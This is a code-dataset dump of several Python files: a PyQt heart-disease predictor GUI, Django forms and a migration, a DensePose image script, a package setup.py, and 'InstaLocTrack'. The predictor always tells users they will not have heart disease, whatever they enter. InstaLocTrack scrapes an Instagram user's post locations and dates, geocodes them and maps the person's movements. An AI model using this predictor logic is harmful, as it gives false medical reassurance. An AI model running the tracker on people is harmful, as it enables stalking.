self.comboBox_coves.addItem(\"\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.horizontalLayout_6.addWidget(self.comboBox_coves)\r\n spacerItem25 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem25)\r\n self.verticalLayout.addLayout(self.horizontalLayout_6)\r\n spacerItem26 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem26)\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n spacerItem27 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_7.addItem(spacerItem27)\r\n self.analyseButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\r\n self.analyseButton.setMinimumSize(QtCore.QSize(150, 0))\r\n font = QtGui.QFont()\r\n font.setPointSize(8)\r\n font.setBold(True)\r\n font.setItalic(False)\r\n font.setWeight(75)\r\n self.analyseButton.setFont(font)\r\n self.analyseButton.setAutoFillBackground(False)\r\n self.analyseButton.setStyleSheet(\"background-color:green;\\n\"\r\n\"color:white;\\n\"\r\n\"border-radius:13px;\\n\"\r\n\"font:bold 14px;\\n\"\r\n\"padding: 6px;\")\r\n self.analyseButton.setObjectName(\"analyseButton\")\r\n self.horizontalLayout_7.addWidget(self.analyseButton)\r\n spacerItem28 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_7.addItem(spacerItem28)\r\n self.verticalLayout.addLayout(self.horizontalLayout_7)\r\n spacerItem29 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem29)\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.verticalLayout.addLayout(self.horizontalLayout_8)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n self.analyseButton.clicked.connect(self.show_result)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Heart Disease Predictor\"))\r\n MainWindow.setWindowIcon(QtGui.QIcon(appctxt.get_resource('icon.png')))\r\n self.label_title.setText(_translate(\"MainWindow\", \"Heart Disease Predictor\"))\r\n self.label_age.setText(_translate(\"MainWindow\", \"Enter Age:\"))\r\n self.label_gender.setText(_translate(\"MainWindow\", \"Gender:\"))\r\n self.comboBox_gender.setPlaceholderText(_translate(\"MainWindow\", \"Select Gender\"))\r\n self.comboBox_gender.setItemText(0, _translate(\"MainWindow\", \"Male\"))\r\n self.comboBox_gender.setItemText(1, _translate(\"MainWindow\", \"Female\"))\r\n self.label_bp.setText(_translate(\"MainWindow\", \"Resting Blood Pressure:\"))\r\n self.label_cp.setText(_translate(\"MainWindow\", \"Chest Pain Type:\"))\r\n self.comboBox_cp.setPlaceholderText(_translate(\"MainWindow\", \"Chest Pain Type\"))\r\n self.comboBox_cp.setItemText(0, _translate(\"MainWindow\", \"Typical Angina\"))\r\n self.comboBox_cp.setItemText(1, _translate(\"MainWindow\", \"Atypical Angina\"))\r\n self.comboBox_cp.setItemText(2, _translate(\"MainWindow\", \"Non-anginal Pain\"))\r\n self.comboBox_cp.setItemText(3, _translate(\"MainWindow\", \"Asymptomatic\"))\r\n self.label_chol.setText(_translate(\"MainWindow\", \"Serum Cholestoral in mg/dl:\"))\r\n self.label_fbs.setText(_translate(\"MainWindow\", \"Fasting Blood Sugar in mg/dl:\"))\r\n self.label_restecg.setText(_translate(\"MainWindow\", \"Resting Electrocardiographic Results:\"))\r\n self.comboBox_restecg.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_restecg.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n self.comboBox_restecg.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.label_maxhrt.setText(_translate(\"MainWindow\", \"Maximum Heart Rate Achieved:\"))\r\n self.label_exang.setText(_translate(\"MainWindow\", \"Exercise Induced Angina:\"))\r\n self.comboBox_exang.setItemText(0, _translate(\"MainWindow\", \"Yes\"))\r\n self.comboBox_exang.setItemText(1, _translate(\"MainWindow\", \"No\"))\r\n self.label_oldpeak.setText(_translate(\"MainWindow\", \"Oldpeak:\"))\r\n self.label_thal.setText(_translate(\"MainWindow\", \"Thalassemia:\"))\r\n self.comboBox_thal.setItemText(0, _translate(\"MainWindow\", \"Normal\"))\r\n self.comboBox_thal.setItemText(1, _translate(\"MainWindow\", \"Fixed Defect\"))\r\n self.comboBox_thal.setItemText(2, _translate(\"MainWindow\", \"Reversable Defect\"))\r\n self.label_slope.setText(_translate(\"MainWindow\", \"Slope of the peak exercise ST segment\"))\r\n self.comboBox_slope.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_slope.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n self.comboBox_slope.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.label_coves.setText(_translate(\"MainWindow\", \"Number of major vessels colored by Flourosopy\"))\r\n self.comboBox_coves.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_coves.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n self.comboBox_coves.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.comboBox_coves.setItemText(3, _translate(\"MainWindow\", \"3\"))\r\n self.analyseButton.setText(_translate(\"MainWindow\", \"Analyse Report\"))\r\n\r\n def show_result(self):\r\n msg = QMessageBox()\r\n msg.setWindowTitle('Result of Analysis')\r\n msg.setWindowIcon(QtGui.QIcon(appctxt.get_resource('icon.png')))\r\n msg.setText('Congratulations! You will not have a Heart Disease :)')\r\n msg.setIcon(QMessageBox.Information)\r\n\r\n x = msg.exec_()\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n #app = QtWidgets.QApplication(sys.argv)\r\n appctxt = ApplicationContext()\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(appctxt.app.exec_())\r\n","sub_path":"src/main/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"326116067","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport re\nimport os\nfrom codecs import open\n\n\nname = \"pout\"\n\nkwargs = {\"name\": name}\n\ndef read(path):\n if os.path.isfile(path):\n with open(path, encoding='utf-8') as f:\n return f.read()\n return \"\"\n\n\nvpath = os.path.join(name, \"__init__.py\")\nif os.path.isfile(vpath):\n kwargs[\"packages\"] = find_packages(exclude=[\"tests\", \"tests.*\", \"*_test*\", \"examples\"])\nelse:\n vpath = \"{}.py\".format(name)\n kwargs[\"py_modules\"] = [name]\nkwargs[\"version\"] = re.search(r\"^__version__\\s*=\\s*[\\'\\\"]([^\\'\\\"]+)\", read(vpath), flags=re.I | re.M).group(1)\n\n\n# https://pypi.org/help/#description-content-type\nkwargs[\"long_description\"] = read('README.md')\nkwargs[\"long_description_content_type\"] = \"text/markdown\"\n\nkwargs[\"tests_require\"] = [\"testdata\"]\nkwargs[\"install_requires\"] = []\n\n\nsetup(\n description='Prints out python variables in an easy to read way, handy for debugging',\n author='Jay Marcyes',\n author_email='jay@marcyes.com',\n url='http://github.com/Jaymon/{}'.format(name),\n license=\"MIT\",\n classifiers=[ # https://pypi.python.org/pypi?:action=list_classifiers\n 'Development Status :: 4 - Beta',\n 'Environment :: Plugins',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python :: 3',\n ],\n #test_suite = \"pout_test\",\n entry_points = {\n 'console_scripts': [\n# '{}.json = {}.__main__:main_json'.format(name, name),\n# '{}.char = {}.__main__:main_char'.format(name, name)\n# '{}.inject = {}.__main__:main_inject'.format(name, name)\n '{} = {}.__main__:main'.format(name, name)\n ],\n },\n **kwargs\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"521998480","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('teacher', '0002_savedupload'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='savedupload',\n name='subject',\n field=models.ForeignKey(default=None, related_name='files', to='teacher.Subject'),\n ),\n ]\n","sub_path":"teacher/migrations/0003_savedupload_subject.py","file_name":"0003_savedupload_subject.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"294982282","text":"import os\nimport numpy as np\nimport cv2\nfrom basic_lib import Get_List,ImageToIUV,IUVToImage\nfrom PIL import Image\ndef refresh(lis,data):\n for i in range(len(lis)-1):\n lis[len(lis)-i-1] = lis[len(lis)-i-2]\n lis[0] = data\n return lis\n\ndef init(img_path,pose_path,delt):\n iuv_map = np.zeros((1200, 800, 3)).astype(np.uint8)\n img = cv2.imread(img_path)\n pose = cv2.imread(pose_path)\n uv_map_new = ImageToIUV(img, pose)\n uv_map_all = [uv_map_new for i in range(delt)]\n x_tmp, y_tmp = np.where((uv_map_new[..., 0] + uv_map_new[..., 1] + uv_map_new[..., 2]) != 0)\n iuv_map[x_tmp, y_tmp, ...] = uv_map_new[x_tmp, y_tmp, ...]\n return iuv_map,uv_map_all\n\n# 利用t时刻和之前 10 帧时间的图像得到展开图\ntime_length = 10\npath_img = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/img'\npath_pose = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/DensePose'\nsave_root = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/DensePoseProcess/uv_unwrap_part'\n\n_,name_saved = Get_List(save_root)\n_,name_all = Get_List(path_pose)\nname_all.sort()\n\n# init\nuv_map_past_all = []\nuv_map_future_all = []\nfor i in range(int(time_length/2)):\n name_img = name_all[0][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[0]))\n uv_map_past_all.append(ImageToIUV(img, pose))\n\n name_img = name_all[i][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[i]))\n uv_map_future_all.append(ImageToIUV(img, pose))\n\nbasic_img = './video/video_06.png'\nbasic_pose = './video/video_06_IUV.png'\nbasic_back_img = './video/video_06_back.png'\nbasic_back_pose = './video/video_06_back_IUV.png'\nbasic_IUV = ImageToIUV(cv2.imread(basic_img),cv2.imread(basic_pose))\nbasic_IUV_back = ImageToIUV(cv2.imread(basic_back_img),cv2.imread(basic_back_pose))\ntmp = basic_IUV[..., 0] + basic_IUV[..., 1] + basic_IUV[..., 2]\nx,y = np.where((tmp) == 0)\nbasic_IUV[x,y,...] = basic_IUV_back[x,y,...]\nuv_map_old = basic_IUV.copy()\n\n\n\nindex_test = 0\nfor name_index in range(len(name_all)):\n past_index = max(name_index-1,0)\n future_index = min(name_index+int(time_length/2),len(name_all)-1)\n if name_all[name_index] in name_saved:\n continue\n # 现在\n name_img = name_all[name_index][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[name_index]))\n uv_map_now = ImageToIUV(img, pose)\n # a = Image.fromarray(uv_map_now).crop((0, 200, 200, 400))\n # a.show()\n # 将来\n name_img = name_all[future_index][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[future_index]))\n uv_map_future = ImageToIUV(img, pose)\n\n\n tmp = uv_map_now.copy()\n for map_future,map_past in zip(uv_map_future_all,uv_map_past_all):\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) == 0)\n uv_map_now[x,y,...] = map_future[x,y,...]\n uv_map_now[x, y, ...] = map_past[x, y, ...]\n\n refresh(uv_map_past_all,tmp)\n refresh(uv_map_future_all, uv_map_future)\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) != 0)\n x_max = max(x)\n x_min = min(x)\n y_max = max(y)\n y_min = min(y)\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) == 0)\n x[x > x_max] = 0\n x[x < x_min] = 0\n y[y > y_max] = 0\n y[y < y_min] = 0\n uv_map_now[x,y,...] = uv_map_old[x,y,...]\n uv_map_old = uv_map_now\n # uv_map_final[x,y,...] = uv_map_now[x,y,...]\n # cv2.imshow('a', uv_map_now)\n # cv2.waitKey(1)\n cv2.imwrite(os.path.join(save_root, name_all[name_index]),uv_map_now)\n print(str(name_index*1.0/len(name_all)) + ' ' + str(name_index))","sub_path":"UV_unwrap_part.py","file_name":"UV_unwrap_part.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"131213747","text":"from django import forms\nfrom apps.escuela.models import Alumno, CAMPUS_CHOICES, Institucion, SECTOR_CHOICES, \\\n NIVEL_CHOICES as NIVEL_INSTITUCION_CHOICES, SUBNIVEL_CHOICES as SUBNIVEL_INSTITUCION_CHOICES, \\\n Supervisor, Periodo\n\nNIVEL_CHOICES = (\n ('','Nivel'),\n ('1','1'),\n ('2','2'),\n ('3','3'),\n)\n\nCAMPUS_CHOICES = (\n ('', 'Campus'),\n CAMPUS_CHOICES[0],\n CAMPUS_CHOICES[1],\n)\n\ndef get_institucion_choices():\n choices = [('','Institución')]\n for institucion in Institucion.objects.all().order_by('nombre'):\n choices.append((institucion.pk, institucion.nombre))\n return choices\n\n\nclass AlumnoFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre o matrícula', required=False, widget=forms.TextInput(attrs={'class':'form-control input-sm','placeholder':'Buscar nombre, apellido, matrícula'}))\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES, attrs={'class':'selectpicker'}), required=False)\n # activo = forms.CharField(widget=forms.Select(choices=((True,'Activo'),(False,'Inactivo')), attrs={'class':'selectpicker'}), required=False)\n campus = forms.CharField(widget=forms.Select(choices=CAMPUS_CHOICES, attrs={'class':'selectpicker'}), required=False)\n # Comentar cuando se hagan migraciones\n institucion = forms.CharField(widget=forms.Select(choices=get_institucion_choices(), attrs={'class':'selectpicker'}))\n\nSECTOR_CHOICES_FILTRO = [\n ('','Sector'),\n]\nSECTOR_CHOICES_FILTRO.extend(SECTOR_CHOICES)\n\nNIVEL_CHOICES_FILTRO = [\n ('','Nivel'),\n]\nNIVEL_CHOICES_FILTRO.extend(NIVEL_INSTITUCION_CHOICES)\n\nSUBNIVEL_CHOICES_FILTRO = [\n ('','Subnivel'),\n]\nSUBNIVEL_CHOICES_FILTRO.extend(SUBNIVEL_INSTITUCION_CHOICES)\n\ndef get_supervisor_choices():\n choices = [('','Supervisor')]\n for supervisor in Supervisor.objects.all().order_by('usuario__nombre','usuario__apellido_paterno'):\n choices.append((supervisor.pk, supervisor.usuario.get_full_name()))\n return choices\n\nclass InstitucionFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control input-sm', 'placeholder': 'Buscar por nombre'}))\n sector = forms.CharField(widget=forms.Select(choices=SECTOR_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n subnivel = forms.CharField(widget=forms.Select(choices=SUBNIVEL_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n supervisor = forms.CharField(required=False, widget=forms.Select(attrs={'class':'selectpicker'}, choices=get_supervisor_choices()))\n nivel_practicas = forms.CharField(required=False, widget=forms.Select(attrs={'class': 'selectpicker'}, choices=(\n ('','Nivel prácticas'),\n (1,'Prácticas 1'),\n (2,'Prácticas 2'),\n (3,'Prácticas 3'),\n )))\n\nclass GrupoFiltrosForm(forms.Form):\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES, attrs={'class': 'selectpicker'}), required=False)\n campus = forms.CharField(widget=forms.Select(choices=CAMPUS_CHOICES, attrs={'class': 'selectpicker'}),\n required=False)\n supervisor = forms.CharField(required=False,\n widget=forms.Select(attrs={'class': 'selectpicker'}, choices=get_supervisor_choices()))\n periodo = forms.ModelChoiceField(\n queryset=Periodo.objects.all().order_by('-pk'),\n widget=forms.Select(attrs={'class': 'selectpicker'}),\n initial=Periodo.objects.filter(activo=True).last().pk\n )\n\ndef get_instituciones_choices():\n choices = [('','Institución')]\n choices.extend(Institucion.objects.all().order_by('nombre').values_list('pk','nombre'))\n return choices\n\nclass ProyectoFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre del proyecto o alumno', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control input-sm', 'placeholder': 'Buscar por nombre, alumno o matrícula'}))\n institucion = forms.CharField(required=False,\n widget=forms.Select(attrs={'class': 'selectpicker'}, choices=get_instituciones_choices()))","sub_path":"apps/escuela/forms_filtros.py","file_name":"forms_filtros.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"21416684","text":"from selenium import webdriver\nimport time\nimport re\nimport json\nimport requests\nimport sys\nimport asyncio \nimport jinja2\nfrom concurrent.futures import ThreadPoolExecutor\n\nif len(sys.argv) < 2:\n print(\"Usage: python3 instaloctrack.py \")\n exit()\n\nusername = sys.argv[1] #Instagram account to investigate\nbrowser = webdriver.Chrome('/usr/bin/chromedriver')\nbrowser.get('https://www.instagram.com/'+username+'/?hl=fr')\n\nnumber_publications = browser.find_element_by_xpath(\"/html/body\").text.strip().split(\"\\n\")[3].split(\" \")[0] \n\nspecial_chars = {\n \"\\\\u00c0\" : \"À\",\n \"\\\\u00c1\" : \"Á\",\n \"\\\\u00c2\" : \"Â\",\n \"\\\\u00c3\" : \"Ã\",\n \"\\\\u00c4\" : \"Ä\",\n \"\\\\u00c5\" : \"Å\",\n \"\\\\u00c6\" : \"Æ\",\n \"\\\\u00c7\" : \"Ç\",\n \"\\\\u00c8\" : \"È\",\n \"\\\\u00c9\" : \"É\",\n \"\\\\u00ca\" : \"Ê\",\n \"\\\\u00cb\" : \"Ë\",\n \"\\\\u00cc\" : \"Ì\",\n \"\\\\u00cd\" : \"Í\",\n \"\\\\u00ce\" : \"Î\",\n \"\\\\u00cf\" : \"Ï\",\n \"\\\\u00d1\" : \"Ñ\",\n \"\\\\u00d2\" : \"Ò\",\n \"\\\\u00d3\" : \"Ó\",\n \"\\\\u00d4\" : \"Ô\",\n \"\\\\u00d5\" : \"Õ\",\n \"\\\\u00d6\" : \"Ö\",\n \"\\\\u00d8\" : \"Ø\",\n \"\\\\u00d9\" : \"Ù\",\n \"\\\\u00da\" : \"Ú\",\n \"\\\\u00db\" : \"Û\",\n \"\\\\u00dc\" : \"Ü\",\n \"\\\\u00dd\" : \"Ý\",\n \"\\\\u00df\" : \"ß\",\n \"\\\\u00e0\" : \"à\",\n \"\\\\u00e1\" : \"á\",\n \"\\\\u00e2\" : \"â\",\n \"\\\\u00e3\" : \"ã\",\n \"\\\\u00e4\" : \"ä\",\n \"\\\\u00e5\" : \"å\",\n \"\\\\u00e6\" : \"æ\",\n \"\\\\u00e7\" : \"ç\",\n \"\\\\u00e8\" : \"è\",\n \"\\\\u00e9\" : \"é\",\n \"\\\\u00ea\" : \"ê\",\n \"\\\\u00eb\" : \"ë\",\n \"\\\\u00ec\" : \"ì\",\n \"\\\\u00ed\" : \"í\",\n \"\\\\u00ee\" : \"î\",\n \"\\\\u00ef\" : \"ï\",\n \"\\\\u00f0\" : \"ð\",\n \"\\\\u00f1\" : \"ñ\",\n \"\\\\u00f2\" : \"ò\",\n \"\\\\u00f3\" : \"ó\",\n \"\\\\u00f4\" : \"ô\",\n \"\\\\u00f5\" : \"õ\",\n \"\\\\u00f6\" : \"ö\",\n \"\\\\u00f8\" : \"ø\",\n \"\\\\u00f9\" : \"ù\",\n \"\\\\u00fa\" : \"ú\",\n \"\\\\u00fb\" : \"û\",\n \"\\\\u00fc\" : \"ü\",\n \"\\\\u00fd\" : \"ý\",\n \"\\\\u00ff\" : \"ÿ\",\n \"'\" : \"'\"\n}\n\ndef resolve_special_chars(location):\n matches = re.findall(\"(\\\\\\\\u00[\\w+]{2}|')\", location) #catch special chars\n if matches != []:\n for special_char in matches:\n location = location.replace(special_char,special_chars.get( special_char, \"\"))\n return location\n \ndef scrolls(publications): # scrolls required to snag all the data accordingly to the number of posts\n return (int(publications))//11\n #return 1 #for testing purpose\n\ndef fetch_urls(number_publications):\n links = []\n links.extend(re.findall('/p/([^/]+)/', browser.page_source)) \n n_scrolls = scrolls(number_publications)\n\n for i in range(n_scrolls): # collecting all the pictures links in order to see which ones contains location data\n print(\"Scrolling the Instagram profile, fetching pictures URLs ...\" + str(100*i//n_scrolls) + \"% of the profile scrolled \", end=\"\\r\")\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight)\")\n links.extend(re.findall('/p/([^/]+)/', browser.page_source)) \n time.sleep(1) # dont change this, otherwise some scrolls won't be effective and all the data won't be scrapped\n\n return list(dict.fromkeys(links)) # remove duplicates\n\ndef parse_location_timestamp(content):\n location = []\n try:\n address = re.search(r'\\\\/explore\\\\/locations\\\\/[0-9]+\\\\/([^/]+)\\\\/', content).group(1).replace(\"-\", \" \")\n address = resolve_special_chars(address)\n except:\n address= \"Error\"\n \n try:\n city = re.search('\"addressLocality\":\"([^\"]+)\"', content)[0].split(\":\")[1].split(\",\")[0].replace(\"\\\"\", \"\")\n #city = re.search('\"city_name\":\"([^\"]+)\"', content)[0].split(\":\")[1].split(\",\")[0].replace(\"\\\"\", \"\")\n city = resolve_special_chars(city)\n \n except:\n city = \"Error\"\n \n try:\n countrycode = re.search('Country\",\"name\":\"([^\"]+)\"', content)[0].split(\":\")[1].replace(\"\\\"\", \"\")\n countrycode = resolve_special_chars(countrycode)\n except:\n countrycode = \"Error\"\n \n location.extend([address, city, countrycode])\n\n if location != [\"Error\", \"Error\", \"Error\"]:\n tmp_timestamp = re.search('\"uploadDate\":\"([^\"]+)\"', content)[0].split('T')[0]\n return [location,re.sub('[^0-9\\-]', '', tmp_timestamp)]\n else:\n return None\n\ndef fetch_locations_and_timestamps(links):\n sys.stdout.write(\"\\033[K\")\n max_wrk = 50\n print(\"Fetching Locations and Timestamps on each picture ... \" + str(len(links)) + \" links processed asynchronously by a pool of \" + str(max_wrk) , end=\"\\r\")\n executor = ThreadPoolExecutor(max_workers=max_wrk) # didnt find any information about Instagram / Facebook Usage Policy ... people on stackoverflow say there's no limit if you're not using any API so ... ¯\\_(ツ)_/¯\n loop = asyncio.get_event_loop()\n\n async def make_requests():\n futures = [loop.run_in_executor(executor, requests.get, 'https://www.instagram.com/p/' + url) for url in links]\n await asyncio.wait(futures)\n return futures\n\n links_locations_timestamps = []\n futures = loop.run_until_complete(make_requests())\n number_locs = len(futures)\n count = 0\n\n for i in range(0, number_locs):\n content = futures[i].result().text\n location_timestamp = parse_location_timestamp(content)\n if location_timestamp != None:\n count += 1\n links_locations_timestamps.append(['https://www.instagram.com/p/'+links[i], location_timestamp[0], location_timestamp[1]])\n \n print(\"Parsing location data ... \" + str(i) + \"/\" + str(number_locs) + \" links processed... \" + \" Found location data on \" + str(count) + \" links\" , end=\"\\r\")\n tmplist = [x[0] for x in links_locations_timestamps]\n print(tmplist)\n return links_locations_timestamps\n\n\n\ndef geocode(location):\n query = \"https://nominatim.openstreetmap.org/search?\"\n if location[0] != \"Error\":\n query += \"q=\" + resolve_special_chars(location[0]) + \"&\"\n if location[1] != \"Error\":\n query += \"city=\" + location[1] + \"&\"\n if location[2] != \"Error\":\n query += \"countrycodes=\" + location[2] + \"&\"\n return requests.get(query + \"&format=json&limit=1\").json()[0]\n\ndef geocode_all(links_locations_and_timestamps):\n sys.stdout.write(\"\\033[K\")\n errors = 0\n count = 1\n gps_coordinates = []\n\n for location in links_locations_and_timestamps:\n print(\"Fetching GPS Coordinates ... : Processing location number \" + str(count) + \" out of \" + str(len(links_locations_and_timestamps)) + \" - Number of errors:\" + str(errors), end=\"\\r\")\n try:\n tmp_geoloc = geocode(location[1])\n gps_coordinates.append([tmp_geoloc['lat'], tmp_geoloc['lon']])\n except:\n print(\"An exception occurred for: \" + str(location[1]))\n errors+=1\n gps_coordinates.append(\"Error\")\n time.sleep(1) # Respect Normatim's Usage Policy! (1 request per sec max) https://operations.osmfoundation.org/policies/nominatim/\n count+=1\n \n sys.stdout.write(\"\\033[K\")\n\n return gps_coordinates\n\ndef export_data(links_locations_and_timestamps, gps_coordinates):\n\n json_dump = []\n errors = []\n\n for i in range(0, len(links_locations_and_timestamps)):\n links_locations_and_timestamps[i].append(gps_coordinates[i])\n if gps_coordinates[i] != \"Error\":\n json_dump.append({\"link\" : links_locations_and_timestamps[i][0],\"place\" : links_locations_and_timestamps[i][1], \"timestamp\" : links_locations_and_timestamps[i][2], \"gps\" : {\"lat\" : links_locations_and_timestamps[i][3][0] , \"lon\" : links_locations_and_timestamps[i][3][1]}})\n else:\n errors.append(({\"link\" : links_locations_and_timestamps[i][0],\"place\" : links_locations_and_timestamps[i][1], \"timestamp\" : links_locations_and_timestamps[i][2], \"gps\" : \"Error\"}))\n with open(username + '_instaloctrack_data.json', 'w') as filehandle:\n json.dump(json_dump, filehandle)\n\n with open(username + '_instaloctrack_errors.json', 'w') as filehandle:\n json.dump(errors, filehandle)\n print(\"Location names, timestamps, and GPS Coordinates were writtent to : \" + username + '_instaloctrack_data.json')\n\n return len(json_dump),len(errors)\n\ndef map_locations():\n templateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n template = templateEnv.get_template(\"template.html\")\n outputText = template.render(username=username, \n publications_number=number_publications, \n retrieved_number=len(links_locations_and_timestamps), \n mapped_number=numbers[0], \n links=str([x[0] for x in links_locations_and_timestamps]), \n errors_number=numbers[0], \n places=str([x[1] for x in links_locations_and_timestamps]), \n timestamps=str([x[2] for x in links_locations_and_timestamps]), \n locations=str(gps_coordinates)) \n\n with open(username + \"_instaloctrack_map.html\", 'w') as f:\n f.write(outputText)\n f.close()\n print(\"Map with all the markers was written to: \" + username + '_instaloctrack_map.html')\n\n\nlinks = fetch_urls(number_publications)\nbrowser.quit()\nlinks_locations_and_timestamps = fetch_locations_and_timestamps(links)\ngps_coordinates = geocode_all(links_locations_and_timestamps)\nnumbers = export_data(links_locations_and_timestamps, gps_coordinates)\nmap_locations()\n\n\n","sub_path":"InstaLocTrack.py","file_name":"InstaLocTrack.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"245339090","text":"import argparse\nimport os\nimport signal\nimport subprocess\n\nfrom _shutil import call_echo\n\n\ndef start_server(file=None, port=None, dev=True):\n script_root = os.path.realpath(os.path.dirname(__file__))\n movy_root = os.path.join(script_root, \"movy\")\n\n if not os.path.exists(os.path.join(movy_root, \"node_modules\")):\n call_echo([\"yarn\"], cwd=movy_root)\n\n launch_script = os.path.join(movy_root, \"bin\", \"movy.js\")\n args = [\n \"node\",\n launch_script,\n \"--no-open\",\n \"--content\",\n os.path.join(script_root, \"movyutils\"),\n ]\n\n if port is None:\n port = 5555\n args += [\"--port\", \"%d\" % port]\n\n if not dev:\n args += [\"--no-hot\"]\n\n args += [file]\n\n ps = subprocess.Popen(\n args,\n cwd=movy_root,\n # CTRL+C signals will be disabled in current process\n creationflags=0x00000200,\n )\n return ps\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--port\", type=int, default=None)\n parser.add_argument(\n \"file\", type=str, help=\"animation js file\", nargs=\"?\", default=None\n )\n\n args = parser.parse_args()\n if args.file is not None:\n file = args.file\n else:\n file = os.environ.get(\"MOVY_FILE\")\n\n ps = start_server(file, port=args.port)\n\n try:\n ps.wait()\n except KeyboardInterrupt:\n ps.send_signal(signal.CTRL_C_EVENT)\n","sub_path":"scripts/r/videoedit/start_movy_server.py","file_name":"start_movy_server.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
